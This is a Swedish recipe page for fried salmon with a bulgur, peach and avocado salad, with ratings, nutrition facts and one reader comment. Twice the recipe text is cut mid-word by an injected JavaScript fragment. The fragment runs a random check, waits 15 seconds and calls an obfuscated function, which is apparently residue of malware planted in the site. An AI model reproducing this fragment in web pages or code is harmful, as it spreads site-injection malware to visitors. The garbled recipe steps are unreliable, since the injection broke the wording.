Stekt lax med bulgursallad

2013-06-08
IMG_5127IMG_5125
  • Servings : 1
  • Prep Time : 5m
  • Cook Time : 15m
  • Ready In : 20m

Smakar gott kallt som varmt, kanske något att testa till nästa grillning?

Ingredienser

  • Laxfilé 
  • 80g kokt fullkornsbulgur
  • 30g avokado
  • 1/2-1 persika
  • 25g lättyoghurt
  • 25g kvarg
  • 1/4 tsk honung
  • Lime, efter smak
  • Salt, efter smak

Genomförandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}e

Steg 1

Koka fullkornsbulgurn enligt anvisning på förpackningen och ställ sedan åt sidan för att svalna. (Tips: koka i lite buljong istället för salt – ger mycket god smak!)

Steg 2

Rör ihop kvarg, lättyoghurt, honung och riven lime samt salt efter smak. Ställ in i kylen och låt smakerna sätta sig.

 

Steg 3

Ställ en teflonpanna på en varm platta och vänta en minut innan du lägger ner laxen. Smör/olja kan användas om man vill, men enligt mig blir laxen krispigast om man steker den såhär.
Medan laxen ligger i pannan, skär upp persika och avokado i lika stora bitar.

 

Steg 4

Blandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a ihop persikan och avokadon med den avsvalnade bulgurn – servera!

 

Medlemsbetyg

(4.6 / 5)

4.6 5 8
Betygsätt recept

8 people rated this recipe

Related Recipes:
  • Nutellapannkakor

    Nutellapannkakor

  • _SAM0985

    Lowcarb Carbonara

  • _SAM0905

    Sallad på svartvitlöks rostad pumpa, lök, paprika, tomat med chevreost, spenat och svartkålschips.

  • _SAM0920

    Svartvitlöks rostad kyckling

  • Avokado & äggmacka

    Avokado & äggmacka

Näringssinnehåll

Informationen gäller per portion

  • Protein

    33g
  • Kolhydrater

    23g
  • Fett

    22g
  • Kalorier

    422

Recipe Comments

  1. posted by Niklas Ekström on 19/01/2014

    Super gott och lättlagad, bytte ut persika mot mango, en bra o nyttig middag som rekommenderas!

      Reply

Post A Comment

Current ye@r *